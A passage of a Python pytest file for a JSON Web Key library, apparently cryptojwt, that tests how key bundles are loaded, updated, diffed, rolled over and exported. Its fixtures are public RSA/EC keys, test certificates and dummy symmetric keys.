\"qqUXHuXV2Z0BpvgvDhzB5cSNO12clwD_fZ4CnbvuvfbBAgpVg774smz2z3ov\"\n \"6SsZ6ZD5Tc_9gE2ryLW6x0RS1y2KSME8EUI2sdJYZw\",\n \"x5c\": [\n \"MIIDOjCCAiKgAwIBAgIUJACZrVNr3gHJrde3OkQwy1lXL6owDQYJKoZIhvcN\"\n \"AQELBQAwSjELMAkGA1UEBhMCU0UxDjAMBgNVBAcMBVVtZcOlMRgwFgYDVQQK\"\n \"DA9JZGVudGl0eSBQeXRob24xETAPBgNVBAMMCGlkcHkub3JnMB4XDTIxMTEw\"\n \"MjA5MzIzOFoXDTIxMTExMjA5MzIzOFowSjELMAkGA1UEBhMCU0UxDjAMBgNV\"\n \"BAcMBVVtZcOlMRgwFgYDVQQKDA9JZGVudGl0eSBQeXRob24xETAPBgNVBAMM\"\n \"CGlkcHkub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArp7a\"\n \"JD9FKKHQgLTeXLMyjB5TS51x/KqA15gBJHF2Ps+rrmcBujpMAi39D7w4SArr\"\n \"9X7DPgHekTPRV6+i46TyqnY1EXPGRb0nCg0rCmkyOAMysXhhuexu3vS7Fa2Y\"\n \"PvX2zpl5svdkOOwLmHBplCTtvScz+L7N1xeknauOLF5Ct39C5Ipv+BWxbNrq\"\n \"D68uIPSOH9ZsoGKVArSI0MSmw5LB7B3i30D8FvmlJyxcEPZOFVahFCmSqqUX\"\n \"HuXV2Z0BpvgvDhzB5cSNO12clwD/fZ4CnbvuvfbBAgpVg774smz2z3ov6SsZ\"\n \"6ZD5Tc/9gE2ryLW6x0RS1y2KSME8EUI2sdJYZwIDAQABoxgwFjAUBgNVHREE\"\n \"DTALgglsb2NhbGhvc3QwDQYJKoZIhvcNAQELBQADggEBAARJIf6TZrhGjI/g\"\n \"QnvOybc6o3lv4nPCJojRoHjFtTd9uk9Eve4Ba7NG8goCs9l3Cq4tPUpqfW42\"\n \"iSr+1Vd9O+cozJAa6PVGwTCfHrtBvQWgM9gk+09lmP8kO73KBcmK9lcwYThJ\"\n \"NNVmZgEwV37hP6sUmyfmuAsxgePPSQqahCej1ORN9YGSH2aeXw+1rhyfTZ6c\"\n \"Kl791b+6So8bDEhfQcFmwNJ/75tr++dRnEdPfSLfid13PFT0W6uxQqeSpCh6\"\n \"TtRiqTb47SIKKnG4YPta2eVOnMNOvy2Lw4nl95V7RSvVw6VbPOx9XXYaONdm\"\n \"mSpbgK1tK1XMkhrp95sU3q1OS8I=\"\n ],\n \"x5t\": \"ScM0uv4bxGMJ7bbrc1scc_uOyLI\",\n },\n {\n \"e\": \"AQAB\",\n \"kid\": \"d1Z6RTJHQmh0NnBaeHpfYVd0U1dIb25fUTQ1aVhjNXFhWHEyTE4wbVh5bw\",\n \"kty\": \"RSA\",\n \"n\": \"zpQAmVzABLrRWV6HiBVbFeho_KhQhm8T_r6LvGP-Znnewpr6J7lBYD9gfVJo2_\"\n \"lOpCqitJvoMJoZxoULJ1xU_Am4padc-as8Sk9vb3FkvxoDrZFByNgmbrNTJCco\"\n \"wUBLTgb1wWde1CPNmr_U_-VBODOy17uTrt7DNEMqEwUi3Qb76J8duHVQT0ECcw\"\n \"crGXbsfV74jSaBAehHxlTt4tG4-LVC9I0IFs9bBykdZVh59uwtaKTlBNuC5frt\"\n \"kGyn_2TM1zCWSVparxqQ_T3e_g2NOr3v5fW_gjDsYZ2543DrE8ta_OCyrqw4wz\"\n \"fBEOb6raI6wCyqFQ5My1bz-qVTap-4hQ\",\n \"x5c\": [\n \"MIIDPjCCAiagAwIBAgIUB70yEjwKX+/dUw4YvP61BKpDHJQwDQYJKoZIhvcNAQ\"\n \"ELBQAwTDELMAkGA1UEBhMCVVMxEDAOBgNVBAcMB1NlYXR0bGUxGDAWBgNVBAoM\"\n \"D0lkZW50aXR5IFB5dGhvbjERMA8GA1UEAwwIaWRweS5vcmcwHhcNMjExMTAyMD\"\n \"kzMjM4WhcNMjExMTEyMDkzMjM4WjBMMQswCQYDVQQGEwJVUzEQMA4GA1UEBwwH\"\n \"U2VhdHRsZTEYMBYGA1UECgwPSWRlbnRpdHkgUHl0aG9uMREwDwYDVQQDDAhpZH\"\n \"B5Lm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAM6UAJlcwAS6\"\n \"0Vleh4gVWxXoaPyoUIZvE/6+i7xj/mZ53sKa+ie5QWA/YH1SaNv5TqQqorSb6D\"\n \"CaGcaFCydcVPwJuKWnXPmrPEpPb29xZL8aA62RQcjYJm6zUyQnKMFAS04G9cFn\"\n \"XtQjzZq/1P/lQTgzste7k67ewzRDKhMFIt0G++ifHbh1UE9BAnMHKxl27H1e+I\"\n \"0mgQHoR8ZU7eLRuPi1QvSNCBbPWwcpHWVYefbsLWik5QTbguX67ZBsp/9kzNcw\"\n \"lklaWq8akP093v4NjTq97+X1v4Iw7GGdueNw6xPLWvzgsq6sOMM3wRDm+q2iOs\"\n \"AsqhUOTMtW8/qlU2qfuIUCAwEAAaMYMBYwFAYDVR0RBA0wC4IJbG9jYWxob3N0\"\n \"MA0GCSqGSIb3DQEBCwUAA4IBAQAyRDDxQcaNDP93SCmZaCnRgpQU8ZnrNk+QpF\"\n \"LPlzUM+CopC5KnJuqBX3C54/uQve54/YpNTbBGGYgqB07381L7z7hn9aNylyFf\"\n \"N9Ck51/lMnG2YYjdwDwhskfsekOA9H44N3GdxYhVuSrZDr+DuS8Sve26HRzh1Z\"\n \"r+1PqSanM7pTJngGFDor7Hn02mKwAYk2HduT7ulYXxzLBcDhgagGTT86P3Jmwm\"\n \"eM6PvsICMpP/6ewzRnsfJ+tmT/WXSS9IX1ZL/UxSEiNYPyJdls83stnjAxpS41\"\n \"IKNMtebp/78p/BGG5Tm+YUPES4h5YwBUsJi3ehhdzzQXjdqSF8xe2wjs6y\"\n ],\n \"x5t\": \"WlQYbhnE2ZQvZKF45tqK5Lwmt8k\",\n },\n ]\n}\n\nif os.path.isdir(\"keys\"):\n shutil.rmtree(\"keys\")\n\n\ndef test_with_sym_key():\n kc = KeyBundle({\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"})\n assert len(kc.get(\"oct\")) == 1\n assert len(kc.get(\"rsa\")) == 0\n assert kc.remote is False\n assert kc.source is None\n\n\ndef 
test_with_2_sym_key():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n assert len(kb.get(\"oct\")) == 2\n assert len(kb) == 2\n\n assert kb.get_key_with_kid(\"kid\") is None\n assert len(kb.kids()) == 2\n\n\ndef test_remove_sym():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n assert len(kb) == 2\n keys = kb.get(\"oct\")\n kb.remove(keys[0])\n assert len(kb) == 1\n\n\ndef test_remove_key_sym():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n assert len(kb) == 2\n keys = kb.get(\"oct\")\n kb.remove(keys[0])\n assert len(kb) == 1\n\n # This should not work\n kb.remove_keys_by_type(\"rsa\")\n # should still be one\n assert len(kb) == 1\n\n\ndef test_rsa_init():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n assert kb\n assert len(kb) == 2\n assert len(kb.get(\"rsa\")) == 2\n\n\ndef test_rsa_init_under_spec():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024})\n assert kb\n assert len(kb) == 2\n assert len(kb.get(\"rsa\")) == 2\n\n\ndef test_unknown_source():\n with pytest.raises(ImportError):\n KeyBundle(source=\"foobar\")\n\n\ndef test_ignore_unknown_types():\n kb = KeyBundle(\n {\n \"kid\": \"q-H9y8iuh3BIKZBbK6S0mH_isBlJsk\"\n \"-u6VtZ5rAdBo5fCjjy3LnkrsoK_QWrlKB08j_PcvwpAMfTEDHw5spepw\",\n \"use\": \"sig\",\n \"alg\": \"EdDSA\",\n \"kty\": \"XXX\",\n \"crv\": \"Ed25519\",\n \"x\": \"FnbcUAXZ4ySvrmdXK1MrDuiqlqTXvGdAaE4RWZjmFIQ\",\n }\n )\n\n assert len(kb) == 0\n\n\ndef test_remove_rsa():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n assert len(kb) == 2\n keys = kb.get(\"rsa\")\n assert len(keys) == 2\n kb.remove(keys[0])\n assert len(kb) == 1\n\n\ndef test_key_mix():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n _sym = SYMKey(**{\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"})\n kb.append(_sym)\n assert len(kb) == 3\n assert len(kb.get(\"rsa\")) == 2\n assert len(kb.get(\"oct\")) == 1\n\n kb.remove(_sym)\n\n assert len(kb) == 2\n assert len(kb.get(\"rsa\")) == 2\n assert len(kb.get(\"oct\")) == 0\n\n\ndef test_get_all():\n kb = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n _sym = SYMKey(**{\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"})\n kb.append(_sym)\n assert len(kb.get()) == 3\n\n _k = kb.keys()\n assert len(_k) == 3\n\n\ndef test_keybundle_from_local_der():\n kb = keybundle_from_local_file(\"{}\".format(RSA0), \"der\", [\"enc\"])\n assert len(kb) == 1\n keys = kb.get(\"rsa\")\n assert len(keys) == 1\n _key = keys[0]\n assert isinstance(_key, RSAKey)\n assert _key.kid\n\n\ndef test_ec_keybundle_from_local_der():\n kb = keybundle_from_local_file(\"{}\".format(EC0), \"der\", [\"enc\"], keytype=\"EC\")\n assert len(kb) == 1\n keys = kb.get(\"ec\")\n assert len(keys) == 1\n _key = keys[0]\n assert _key.kid\n assert isinstance(_key, ECKey)\n\n\ndef test_keybundle_from_local_der_update():\n kb = keybundle_from_local_file(\"file://{}\".format(RSA0), \"der\", [\"enc\"])\n assert len(kb) == 1\n keys = kb.get(\"rsa\")\n assert 
len(keys) == 1\n _key = keys[0]\n assert _key.kid\n assert isinstance(_key, RSAKey)\n\n kb.update()\n\n # Nothing should change\n assert len(kb) == 1\n keys = kb.get(\"rsa\")\n assert len(keys) == 1\n _key = keys[0]\n assert _key.kid\n assert isinstance(_key, RSAKey)\n\n\ndef test_creat_jwks_sym():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([a])\n _jwks = kb.jwks()\n _loc = json.loads(_jwks)\n assert list(_loc.keys()) == [\"keys\"]\n assert set(_loc[\"keys\"][0].keys()) == {\"kty\", \"use\", \"k\", \"kid\"}\n\n\ndef test_keybundle_from_local_jwks_file():\n kb = keybundle_from_local_file(\n \"file://{}\".format(os.path.join(BASE_PATH, \"jwk.json\")), \"jwks\", [\"sig\"]\n )\n assert len(kb) == 1\n\n\ndef test_keybundle_from_local_jwks():\n kb = keybundle_from_local_file(\n \"{}\".format(os.path.join(BASE_PATH, \"jwk.json\")), \"jwks\", [\"sig\"]\n )\n assert len(kb) == 1\n\n\ndef test_update():\n kc = KeyBundle([{\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}])\n assert len(kc.get(\"oct\")) == 1\n assert len(kc.get(\"rsa\")) == 0\n assert kc.remote is False\n assert kc.source is None\n\n kc.update() # Nothing should happen\n assert len(kc.get(\"oct\")) == 1\n assert len(kc.get(\"rsa\")) == 0\n assert kc.remote is False\n assert kc.source is None\n\n\ndef test_update_RSA():\n kc = keybundle_from_local_file(RSAKEY, \"der\", [\"sig\"])\n assert kc.remote is False\n assert len(kc.get(\"oct\")) == 0\n assert len(kc.get(\"RSA\")) == 1\n\n key = kc.get(\"RSA\")[0]\n assert isinstance(key, RSAKey)\n\n kc.update()\n assert kc.remote is False\n assert len(kc.get(\"oct\")) == 0\n assert len(kc.get(\"RSA\")) == 1\n\n key = kc.get(\"RSA\")[0]\n assert isinstance(key, RSAKey)\n\n\ndef test_outdated():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb = KeyBundle([a, b])\n keys = kb.keys()\n now = time.time()\n keys[0].inactive_since = now - 60\n kb.remove_outdated(30)\n assert len(kb) == 1\n\n\ndef test_dump_jwks():\n a = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n b = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb2 = KeyBundle([a, b])\n\n kb1 = rsa_init({\"use\": [\"enc\", \"sig\"], \"size\": 1024, \"name\": \"rsa\", \"path\": \"keys\"})\n\n # Will not dump symmetric keys\n dump_jwks([kb1, kb2], \"jwks_combo\")\n\n # Now read it\n\n nkb = KeyBundle(source=\"file://jwks_combo\", fileformat=\"jwks\")\n\n assert len(nkb) == 2\n # both RSA keys\n assert len(nkb.get(\"rsa\")) == 2\n\n # Will dump symmetric keys\n dump_jwks([kb1, kb2], \"jwks_combo\", symmetric_too=True)\n\n # Now read it\n nkb = KeyBundle(source=\"file://jwks_combo\", fileformat=\"jwks\")\n\n assert len(nkb) == 4\n # two RSA keys\n assert len(nkb.get(\"rsa\")) == 2\n # two symmetric keys\n assert len(nkb.get(\"oct\")) == 2\n\n\ndef test_mark_as_inactive():\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([desc])\n assert len(kb.keys()) == 1\n for k in kb.keys():\n kb.mark_as_inactive(k.kid)\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb.add_jwk_dicts([desc])\n assert len(kb.keys()) == 2\n assert len(kb.active_keys()) == 1\n\n\ndef test_copy():\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([desc])\n assert len(kb.keys()) == 1\n for k in kb.keys():\n kb.mark_as_inactive(k.kid)\n 
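    # Marking a key inactive does not delete it: the key stays in the bundle
    # (and survives copy()) but is excluded from get() and active_keys();
    # passing only_active=False to get() brings it back, as later tests show.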
desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb.add_jwk_dicts([desc])\n\n kbc = kb.copy()\n assert len(kbc.keys()) == 2\n assert len(kbc.active_keys()) == 1\n\n\ndef test_local_jwk():\n _path = full_path(\"jwk_private_key.json\")\n kb = KeyBundle(source=\"file://{}\".format(_path))\n assert kb\n\n\ndef test_local_jwk_update():\n cache_time = 0.1\n _path = full_path(\"jwk_private_key.json\")\n kb = KeyBundle(source=\"file://{}\".format(_path), cache_time=cache_time)\n assert kb\n _ = kb.keys()\n last1 = kb.last_local\n _ = kb.keys()\n last2 = kb.last_local\n assert last1 == last2 # file not changed\n time.sleep(cache_time + 0.1)\n Path(_path).touch()\n _ = kb.keys()\n last3 = kb.last_local\n assert last2 != last3 # file changed\n\n\ndef test_local_jwk_copy():\n _path = full_path(\"jwk_private_key.json\")\n kb = KeyBundle(source=\"file://{}\".format(_path))\n kb2 = kb.copy()\n assert kb2.source == kb.source\n\n\n# def test_remote(httpserver):\n# httpserver.serve_content(json.dumps(JWK1))\n# kb = KeyBundle(source=httpserver.url)\n# assert len(kb.keys())\n# assert len(kb.get('rsa')) == 1\n# assert len(kb.get('oct')) == 1\n\n\n@pytest.fixture()\ndef mocked_jwks_response():\n with responses.RequestsMock() as rsps:\n yield rsps\n\n\ndef test_httpc_params_1():\n source = \"https://login.salesforce.com/id/keys\" # From test_jwks_url()\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=responses.GET, url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n updated, _ = kb._do_remote()\n assert updated == True\n\n\n@pytest.mark.network\ndef test_httpc_params_2():\n httpc_params = {\"timeout\": 0}\n kb = KeyBundle(\n source=\"https://login.salesforce.com/id/keys\",\n httpc=requests.request,\n httpc_params=httpc_params,\n )\n # Will always fail to fetch the JWKS because the timeout cannot be set\n # to 0s\n assert not kb.update()\n\n\ndef test_update_2():\n rsa_key = new_rsa_key()\n _jwks = {\"keys\": [rsa_key.serialize()]}\n fname = \"tmp_jwks.json\"\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb = KeyBundle(source=\"file://{}\".format(fname), fileformat=\"jwks\")\n assert len(kb) == 1\n\n # Added one more key\n ec_key = new_ec_key(crv=\"P-256\", key_ops=[\"sign\"])\n _jwks = {\"keys\": [rsa_key.serialize(), ec_key.serialize()]}\n\n time.sleep(0.5)\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb.update()\n assert len(kb) == 2\n\n\ndef test_update_mark_inactive():\n rsa_key = new_rsa_key()\n _jwks = {\"keys\": [rsa_key.serialize()]}\n fname = \"tmp_jwks.json\"\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb = KeyBundle(source=\"file://{}\".format(fname), fileformat=\"jwks\")\n assert len(kb) == 1\n\n # new set of keys\n rsa_key = new_rsa_key(alg=\"RS256\")\n ec_key = new_ec_key(crv=\"P-256\")\n _jwks = {\"keys\": [rsa_key.serialize(), ec_key.serialize()]}\n\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb.update()\n # 2 active and 1 inactive\n assert len(kb) == 3\n assert len(kb.active_keys()) == 2\n\n assert len(kb.get(\"rsa\")) == 1\n assert len(kb.get(\"rsa\", only_active=False)) == 2\n\n\ndef test_loads_0():\n kb = KeyBundle(JWK0)\n assert len(kb) == 1\n key = kb.get(\"rsa\")[0]\n assert key.kid == \"abc\"\n assert key.kty == \"RSA\"\n\n\ndef test_loads_1():\n jwks = {\n \"keys\": [\n {\n \"kty\": \"RSA\",\n 
\"use\": \"sig\",\n \"e\": \"AQAB\",\n \"n\": \"wf-wiusGhA-gleZYQAOPQlNUIucPiqXdPVyieDqQbXXOPBe3nuggtVzeq7pVFH1dZz4dY2Q2LA5DaegvP8kRvoSB_87ds3dy3Rfym_GUSc5B0l1TgEobcyaep8jguRoHto6GWHfCfKqoUYZq4N8vh4LLMQwLR6zi6Jtu82nB5k8\",\n \"kid\": \"1\",\n },\n {\n \"kty\": \"RSA\",\n \"use\": \"enc\",\n \"e\": \"AQAB\",\n \"n\": \"wf-wiusGhA-gleZYQAOPQlNUIucPiqXdPVyieDqQbXXOPBe3nuggtVzeq7pVFH1dZz4dY2Q2LA5DaegvP8kRvoSB_87ds3dy3Rfym_GUSc5B0l1TgEobcyaep8jguRoHto6GWHfCfKqoUYZq4N8vh4LLMQwLR6zi6Jtu82nB5k8\",\n \"kid\": \"2\",\n },\n ]\n }\n\n kb = KeyBundle(jwks)\n\n assert len(kb) == 2\n assert set(kb.kids()) == {\"1\", \"2\"}\n\n\ndef test_dump_jwk():\n kb = KeyBundle()\n kb.append(RSAKey(pub_key=import_rsa_key_from_cert_file(CERT)))\n jwks = kb.jwks()\n\n _wk = json.loads(jwks)\n assert list(_wk.keys()) == [\"keys\"]\n assert len(_wk[\"keys\"]) == 1\n assert set(_wk[\"keys\"][0].keys()) == {\"kty\", \"e\", \"n\"}\n\n kb2 = KeyBundle(_wk)\n\n assert len(kb2) == 1\n key = kb2.get(\"rsa\")[0]\n assert key.kty == \"RSA\"\n assert isinstance(key.public_key(), rsa.RSAPublicKey)\n\n\nJWKS_DICT = {\n \"keys\": [\n {\n \"n\": \"zkpUgEgXICI54blf6iWiD2RbMDCOO1jV0VSff1MFFnujM4othfMsad7H1kRo50YM5S_X9TdvrpdOfpz5aBaKFhT6Ziv0nhtcekq1eRl8mjBlvGKCE5XGk-0LFSDwvqgkJoFYInq7bu0a4JEzKs5AyJY75YlGh879k1Uu2Sv3ZZOunfV1O1Orta-NvS-aG_jN5cstVbCGWE20H0vFVrJKNx0Zf-u-aA-syM4uX7wdWgQ-owoEMHge0GmGgzso2lwOYf_4znanLwEuO3p5aabEaFoKNR4K6GjQcjBcYmDEE4CtfRU9AEmhcD1kleiTB9TjPWkgDmT9MXsGxBHf3AKT5w\",\n \"e\": \"AQAB\",\n \"kty\": \"RSA\",\n \"kid\": \"5-VBFv40P8D4I-7SFz7hMugTbPs\",\n \"use\": \"enc\",\n },\n {\n \"k\": \"YTEyZjBlMDgxMGI4YWU4Y2JjZDFiYTFlZTBjYzljNDU3YWM0ZWNiNzhmNmFlYTNkNTY0NzMzYjE\",\n \"kty\": \"oct\",\n \"use\": \"enc\",\n },\n {\n \"kty\": \"EC\",\n \"kid\": \"7snis\",\n \"use\": \"sig\",\n \"x\": \"q0WbWhflRbxyQZKFuQvh2nZvg98ak-twRoO5uo2L7Po\",\n \"y\": \"GOd2jL_6wa0cfnyA0SmEhok9fkYEnAHFKLLM79BZ8_E\",\n \"crv\": \"P-256\",\n },\n {\n \"kty\": \"OKP\",\n \"kid\": \"xyzzy\",\n \"use\": \"sig\",\n \"x\": \"11qYAYKxCrfVS_7TyWQHOg7hcvPapiMlrwIaaPcHURo\",\n \"crv\": \"Ed25519\",\n },\n ]\n}\n\n\ndef test_keys():\n kb = KeyBundle(JWKS_DICT)\n\n assert len(kb) == 4\n\n assert len(kb.get(\"rsa\")) == 1\n assert len(kb.get(\"oct\")) == 1\n assert len(kb.get(\"ec\")) == 1\n assert len(kb.get(\"okp\")) == 1\n\n\nEXPECTED = [\n b\"iA7PvG_DfJIeeqQcuXFmvUGjqBkda8In_uMpZrcodVA\",\n b\"akXzyGlXg8yLhsCczKb_r8VERLx7-iZBUMIVgg2K7p4\",\n b\"kLsuyGef1kfw5-t-N9CJLIHx_dpZ79-KemwqjwdrvTI\",\n b\"kPrK_qmxVWaYVA9wwBF6Iuo3vVzz7TxHCTwXBygrS4k\",\n]\n\n\ndef test_thumbprint():\n kb = KeyBundle(JWKS_DICT)\n for key in kb:\n txt = key.thumbprint(\"SHA-256\")\n assert txt in EXPECTED\n\n\n@pytest.mark.network\ndef test_jwks_url():\n keys = KeyBundle(source=\"https://login.salesforce.com/id/keys\")\n # Forces read from the network\n keys.update()\n assert len(keys)\n\n\nKEYSPEC = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_2 = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_3 = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-521\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_4 = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", 
\"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_5 = [\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_6 = [\n {\"type\": \"oct\", \"bytes\": \"24\", \"use\": [\"enc\"], \"kid\": \"code\"},\n {\"type\": \"oct\", \"bytes\": \"24\", \"use\": [\"enc\"], \"kid\": \"token\"},\n {\"type\": \"oct\", \"bytes\": \"24\", \"use\": [\"enc\"], \"kid\": \"refresh_token\"},\n]\n\n\ndef test_key_diff_none():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC)\n assert not diff\n\n\ndef test_key_diff_add_one_ec():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_2)\n assert diff\n assert set(diff.keys()) == {\"add\"}\n assert len(diff[\"add\"]) == 1\n assert diff[\"add\"][0].kty == \"EC\"\n\n\ndef test_key_diff_add_two_ec():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_3)\n assert diff\n assert set(diff.keys()) == {\"add\"}\n assert len(diff[\"add\"]) == 2\n assert diff[\"add\"][0].kty == \"EC\"\n\n\ndef test_key_diff_add_ec_and_rsa():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_4)\n assert diff\n assert set(diff.keys()) == {\"add\"}\n assert len(diff[\"add\"]) == 2\n assert set([k.kty for k in diff[\"add\"]]) == {\"EC\", \"RSA\"}\n\n\ndef test_key_diff_add_ec_del_rsa():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_5)\n assert diff\n assert set(diff.keys()) == {\"add\", \"del\"}\n assert len(diff[\"add\"]) == 1\n assert len(diff[\"del\"]) == 1\n assert diff[\"add\"][0].kty == \"EC\"\n assert diff[\"del\"][0].kty == \"RSA\"\n\n\ndef test_key_bundle_update_1():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n diff = key_diff(_kb, KEYSPEC_2)\n update_key_bundle(_kb, diff)\n\n # There should be 3 keys\n assert len(_kb) == 3\n\n # one RSA\n assert len(_kb.get(\"RSA\")) == 1\n\n # 2 EC\n assert len(_kb.get(\"EC\")) == 2\n\n\ndef test_key_bundle_update_2():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n diff = key_diff(_kb, KEYSPEC_4)\n update_key_bundle(_kb, diff)\n\n # There should be 3 keys\n assert len(_kb) == 4\n\n # one RSA\n assert len(_kb.get(\"RSA\")) == 2\n\n # 2 EC\n assert len(_kb.get(\"EC\")) == 2\n\n\ndef test_key_bundle_update_3():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n diff = key_diff(_kb, KEYSPEC_5)\n update_key_bundle(_kb, diff)\n\n # There should be 3 keys\n assert len(_kb) == 3\n\n # One inactive. 
Only active is implicit\n assert len(_kb.get()) == 2\n\n # one inactive RSA\n assert len(_kb.get(\"RSA\", only_active=False)) == 1\n assert len(_kb.get(\"RSA\")) == 0\n\n # 2 EC\n assert len(_kb.get(\"EC\")) == 2\n assert len(_kb.get(\"EC\", only_active=False)) == 2\n\n\ndef test_key_rollover():\n kb_0 = build_key_bundle(key_conf=KEYSPEC)\n assert len(kb_0.get(only_active=False)) == 2\n assert len(kb_0.get()) == 2\n\n kb_1 = key_rollover(kb_0)\n\n assert len(kb_1.get(only_active=False)) == 4\n assert len(kb_1.get()) == 2\n\n\ndef test_build_key_bundle_sym():\n _kb = build_key_bundle(key_conf=KEYSPEC_6)\n assert len(_kb) == 3\n\n assert len(_kb.get(\"RSA\")) == 0\n assert len(_kb.get(\"EC\")) == 0\n assert len(_kb.get(\"oct\")) == 3\n\n\ndef test_key_bundle_difference_none():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = KeyBundle()\n _kb1.extend(_kb0.keys())\n\n assert _kb0.difference(_kb1) == []\n\n\ndef test_key_bundle_difference():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = build_key_bundle(key_conf=KEYSPEC_2)\n\n assert _kb0.difference(_kb1) == _kb0.keys()\n assert _kb1.difference(_kb0) == _kb1.keys()\n\n\ndef test_unique_keys_1():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = build_key_bundle(key_conf=KEYSPEC_6)\n\n keys = _kb0.keys()\n keys.extend(_kb1.keys())\n\n # All of them\n assert len(unique_keys(keys)) == 6\n\n\ndef test_unique_keys_2():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = KeyBundle()\n _kb1.extend(_kb0.keys())\n\n keys = _kb0.keys()\n keys.extend(_kb1.keys())\n\n # 3 of 6\n assert len(unique_keys(keys)) == 3\n\n\ndef test_key_gen_rsa():\n _jwk = key_gen(\"RSA\", kid=\"kid1\")\n assert _jwk\n assert _jwk.kty == \"RSA\"\n assert _jwk.kid == \"kid1\"\n\n assert isinstance(_jwk, RSAKey)\n\n\ndef test_key_gen_okp():\n _jwk = key_gen(\"OKP\", kid=\"kid1\")\n assert _jwk\n assert _jwk.kty == \"OKP\"\n assert _jwk.kid == \"kid1\"\n\n assert isinstance(_jwk, OKPKey)\n\n\ndef test_init_key():\n spec = {\"type\": \"RSA\", \"kid\": \"one\"}\n\n filename = full_path(\"tmp_jwk.json\")\n if os.path.isfile(filename):\n os.unlink(filename)\n\n _key = init_key(filename, **spec)\n assert _key.kty == \"RSA\"\n assert _key.kid == \"one\"\n\n assert os.path.isfile(filename)\n\n # Should not lead to any change\n _jwk2 = init_key(filename, **spec)\n assert _key == _jwk2\n\n _jwk3 = init_key(filename, \"RSA\", \"two\")\n assert _key != _jwk3\n\n # Now _jwk3 is stored in the file\n _jwk4 